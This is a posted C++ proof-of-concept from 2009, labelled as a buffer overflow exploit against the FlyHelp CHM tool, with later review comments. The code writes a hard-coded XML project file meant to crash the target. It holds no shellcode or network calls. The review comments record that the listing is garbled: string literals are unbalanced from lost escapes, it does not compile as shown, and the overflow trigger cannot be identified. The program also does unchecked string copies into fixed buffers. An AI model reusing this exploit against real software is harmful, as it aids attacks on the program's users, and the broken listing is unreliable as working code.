
flyhelp-overflow.txt

Posted on 21 July 2009

/*
 * Name:    flyhelp.cpp -- FlyHelp .CHM File Buffer Overflo POC
 * Credits: fl0 fl0w
 * Website: http://www.sploitz.10001mb.com
 *
 * What the visible code does: it writes a fixed, embedded XML document
 * (rawData, below) to a file whose name is taken from the command line.
 * It opens no sockets and starts no process other than the console
 * clear in Usage().
 *
 * NOTE(review): this listing was flattened during extraction. Escape
 * sequences inside string literals appear to be lost (one literal is
 * unbalanced, another contains a raw line break), so the code below does
 * not compile exactly as shown. The literals are left as they appear on
 * the page.
 */
/*
 * Demo transcript from the original post (path separators appear to have
 * been lost in extraction):
 *
 *   C:Documents and SettingsStefanDesktopNew Folder1>flyhelp.exe
 *   C:Documents and SettingsStefanDesktopNew Folder1>flyhelp.exe -file test
 *   ***************************************************************************
 *   FlyHelp .CHM File Buffer Overflo POC
 *   Usage is flyhelp.exe -file filename
 *   Credits fl0 fl0w
 *   ***************************************************************************
 *   File build !
 */
/* NOTE(review): <stdio.h> is included twice. exit() and system() are used
   below but <stdlib.h> is not included directly -- presumably it arrives
   through another header; confirm. */
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <assert.h>
#include <windows.h>

/* Size in bytes of the two global work buffers (Name, NeWbuff). */
#define SIZE 100000

/*
 * Embedded file body, declared as 1471 bytes. The bytes are ASCII text:
 * an XML document that starts with
 *   <?xml version="1.0" encoding="Windows-1252" ?>
 *   <XMLConfig><info>CHM Project</info>
 * carries a Version value of 208 and groups named Contents, Files and
 * Options (HHP options, main window settings), and ends with </XMLConfig>.
 * Lines are CRLF-terminated (0x0D, 0x0A).
 *
 * The initializer ends on 0x3E (the closing '>'), not on a 0x00 byte.
 *
 * NOTE(review): no field in the visible bytes is unusually long, so the
 * element that triggers the reported overflow cannot be identified from
 * this listing alone.
 */
char rawData[1471] = {
0x3C, 0x3F, 0x78, 0x6D, 0x6C, 0x20, 0x76, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x3D, 0x22, 0x31, 0x2E, 0x30, 0x22, 0x20, 0x65, 0x6E, 0x63, 0x6F, 0x64, 0x69, 0x6E, 0x67, 0x3D, 0x22, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x2D, 0x31, 0x32, 0x35, 0x32, 0x22, 0x20, 0x3F, 0x3E, 0x0D, 0x0A, 0x3C, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E, 0x3C, 0x69, 0x6E, 0x66, 0x6F, 0x3E, 0x43, 0x48, 0x4D, 0x20, 0x50, 0x72, 0x6F, 0x6A, 0x65, 0x63, 0x74, 0x3C, 0x2F, 0x69, 0x6E, 0x66, 0x6F, 0x3E, 0x0D, 0x0A, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x32, 0x30, 0x38, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x69, 0x6C, 0x65, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x75, 0x6E, 0x74, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x48,
0x48, 0x50, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x20, 0x74, 0x6F, 0x70, 0x69, 0x63, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x22, 0x3E, 0x30, 0x78, 0x34, 0x30, 0x39, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x75, 0x6C, 0x6C, 0x2D, 0x74, 0x65, 0x78, 0x74, 0x20, 0x73, 0x65, 0x61, 0x72, 0x63, 0x68, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x67, 0x20, 0x6E, 0x3D, 0x22, 0x4D, 0x61, 0x69, 0x6E, 0x22, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x5B, 0x38, 0x30, 0x2C, 0x36, 0x30, 0x2C, 0x36, 0x34, 0x30, 0x2C, 0x34, 0x38, 0x30, 0x5D, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x72, 0x65, 0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4E, 0x61, 0x76, 0x69, 0x67, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x74, 0x65, 0x6D, 0x70, 0x2E, 0x68, 0x68, 0x63, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20,
0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x49, 0x6E, 0x64, 0x65, 0x78, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x64, 0x76, 0x53, 0x65, 0x61, 0x72, 0x63, 0x68, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x61, 0x76, 0x6F, 0x72, 0x69, 0x74, 0x65, 0x73, 0x49, 0x6E, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x44, 0x65, 0x66, 0x61, 0x75, 0x6C, 0x74, 0x54, 0x61, 0x62, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x54, 0x61, 0x62, 0x73, 0x50, 0x6F, 0x73, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x30, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x53, 0x68, 0x6F, 0x77, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x42, 0x61, 0x63, 0x6B, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x31, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x53, 0x74, 0x6F, 0x70, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x52, 0x65, 0x66, 0x72, 0x65, 0x73, 0x68, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70,
0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x46, 0x6F, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x72, 0x69, 0x6E, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4F, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4C, 0x6F, 0x63, 0x61, 0x74, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x6F, 0x6D, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x31, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x31, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x31, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4A, 0x75, 0x6D, 0x70, 0x32, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x4E, 0x65, 0x78, 0x74, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x72, 0x65, 0x76, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x79, 0x6E, 0x63, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x41, 0x75, 0x74, 0x6F, 0x53, 0x68, 0x6F, 0x77, 0x48, 0x69, 0x64, 0x65, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x48, 0x69, 0x64, 0x65, 0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x43, 0x61, 0x70, 0x74, 0x69, 0x6F, 0x6E, 0x73, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x43, 0x6C, 0x6F, 0x73, 0x65, 0x64, 0x50, 0x61, 0x6E, 0x65, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x70, 0x20, 0x6E, 0x3D, 0x22, 0x50, 0x61, 0x6E, 0x65, 0x57, 0x69, 0x64, 0x74, 0x68, 0x22, 0x3E, 0x3C, 0x2F, 0x70, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x20, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x67, 0x3E, 0x0D, 0x0A, 0x3C, 0x2F, 0x58, 0x4D, 0x4C, 0x43, 0x6F, 0x6E, 0x66, 0x69, 0x67, 0x3E, } ;

/* Holder for the two helper routines defined after main(); it has no
   data members. */
class EXPLOIT
{
public:
    /* Returns Poz when the two strings compare equal, otherwise Neg. */
    int check (char *, char *);
    /* Clears the console and prints the banner and usage line. */
    void Usage (char *);
};

/* Return values of EXPLOIT::check(): Poz for a match, Neg for a mismatch. */
static int Poz = 1;
static int Neg = 0;

/* Not referenced anywhere in the visible code. */
int i;

/* Output file name: argv[2] followed by the suffix appended in main().
   Namespace-scope array, so it starts out zero-filled. */
char Name [SIZE];

/* Staging copy of rawData used for the %s write in main().
   Namespace-scope array, so it starts out zero-filled. */
char NeWbuff [SIZE];

/*
 * Entry point. Expected invocation per the usage text:
 *   <program> -file <filename>
 *
 * Steps performed by the visible code:
 *   1. print the banner (always, before any argument check);
 *   2. exit with status 0 if fewer than two argv entries are present or
 *      argv[1] is not "-file";
 *   3. build the output name in Name from argv[2] plus a fixed suffix;
 *   4. open that file for writing and write a short prefix followed by
 *      the rawData text;
 *   5. print a completion message and exit with status 0.
 */
int main (int argc, char *argv [])
{
    EXPLOIT VIDEO;

    /* Banner is printed unconditionally; the argc < 2 branch prints it a
       second time. */
    VIDEO.Usage(argv [0]);
    if(argc < 2) {
        VIDEO.Usage(argv [0]);
        exit(0);
    }
    if(VIDEO.check(argv [1], "-file") == Neg) {
        fprintf(stdout , " Incorect input ");
        /* NOTE(review): Name has not been written yet at this point, so %s
           prints an empty string here; argv[0] was probably intended.
           The raw line break inside the literal below is as it appears on
           the page (most likely a lost escape sequence). */
        printf(" ..Usage is %s -file filename.. 
", Name);
        exit(0);
    }
    FILE *f;
    /* NOTE(review): the guard above only ensures argc >= 2, so with exactly
       "-file" and no file name argv[2] is the terminating null pointer and
       this strcpy reads through it. The copy is also unbounded: nothing
       checks the argument length against SIZE before strcpy/strcat. */
    strcpy(Name, argv [2]);
    strcat(Name, " .chm ");
    f = fopen (Name, "w");
    /* assert() is compiled out when NDEBUG is defined, leaving a failed
       fopen() unchecked in such builds. */
    assert( f != NULL);
    /* Copies exactly sizeof(rawData) == 1471 bytes. strncpy adds no
       terminator when the source has no NUL within that length; the later
       %s read relies on the zero-filled remainder of NeWbuff. */
    strncpy(NeWbuff , rawData , sizeof(rawData));
    /* NOTE(review): the literal on the next line is unbalanced as shown on
       the page; an escape sequence appears to have been lost in
       extraction, so the exact prefix written to the file cannot be
       recovered from this listing. */
    fputs("FILE "", f);
    fprintf( f, " %s ", NeWbuff);
    fprintf( stdout , "File build ! ");
    /* The stream is never closed explicitly; exit() flushes and closes it.
       The two statements after exit(0) are unreachable. */
    exit(0);
    getchar();
    return 0;
}

/*
 * Compares two C strings with strcmp().
 * Returns Poz (1) when they are equal and Neg (0) otherwise.
 */
int EXPLOIT::check(char *Arg_, char *_Arg)
{
    if(strcmp(Arg_, _Arg) == 0)
        return Poz;
    return Neg;
}

/*
 * Clears the console by running the "cls" shell command, then prints the
 * banner, the usage line and the credits.
 * The parameter Name is the program name inserted into the usage line; it
 * shadows the global Name buffer inside this function.
 */
void EXPLOIT::Usage(char *Name)
{
    system("cls");
    printf("*************************************************************************** ");
    printf("FlyHelp .CHM File Buffer Overflo POC ");
    printf(" Usage is %s -file filename ", Name);
    fprintf(stdout , "Credits fl0 fl0w ");
    printf("*************************************************************************** ");
}

 
